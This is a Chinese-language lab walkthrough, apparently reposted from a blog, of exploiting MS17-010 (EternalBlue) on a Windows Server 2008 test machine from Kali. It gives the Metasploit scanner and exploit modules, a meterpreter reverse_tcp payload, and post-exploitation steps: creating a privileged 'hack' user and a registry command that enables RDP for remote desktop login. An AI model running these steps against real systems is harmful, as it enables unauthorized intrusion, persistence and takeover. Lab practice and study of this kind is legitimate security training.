用到的试验机

kali ip 192.168.1.106

windows2008   ip   192.168.1.107

用kali扫描靶机端口

 

 

 这里看到445端口是开放的,可以利用17_010

使用命令msfconsole启动metasploit渗透测试平台

 

 使用命令search 17_010搜索漏洞的模块

 

 先利用命令 来调用漏洞扫描模块

use auxiliary/scanner/smb/smb_ms17_010 

设置目标ip或网段

set RHOSTS 192.168.1.107

 执行扫描:run

 

 出现这种状况,就说明这个靶机有这个漏洞的存在

我们调用攻击模块,使用命令

use exploit/windows/smb/ms17_010_eternalblue

 设置目标ip或网段

set RHOSTS 192.168.1.107

 show options查看设置参数

 

 

 设置攻击载荷

set payload windows/x64/meterpreter/reverse_tcp

 执行攻击:run

 

 攻击成功!

拿到shell

输入chcp 65001可以解决乱码问题

 

 接下来就是通过shell对靶机进行控制

创建用户,

 

 创建成功并提权

 

 提权成功

在一开始的扫描并没有发现3389端口开启,所以使用命令开启3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

 

 

 

 3389端口开启

然后使用rdesktop远程桌面连接2008,使用提权的用户进入桌面

 

 使用hack用户登录

登录成功

 

 以上只是一个演示,17_010漏洞还是很危险的

 

原文地址:http://www.cnblogs.com/xwsfw/p/16859549.html

1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长! 2. 分享目的仅供大家学习和交流,请务用于商业用途! 3. 如果你也有好源码或者教程,可以到用户中心发布,分享有积分奖励和额外收入! 4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解! 5. 如有链接无法下载、失效或广告,请联系管理员处理! 6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需! 7. 如遇到加密压缩包,默认解压密码为"gltf",如遇到无法解压的请联系管理员! 8. 因为资源和程序源码均为可复制品,所以不支持任何理由的退款兑现,请斟酌后支付下载 声明:如果标题没有注明"已测试"或者"测试可用"等字样的资源源码均未经过站长测试.特别注意没有标注的源码不保证任何可用性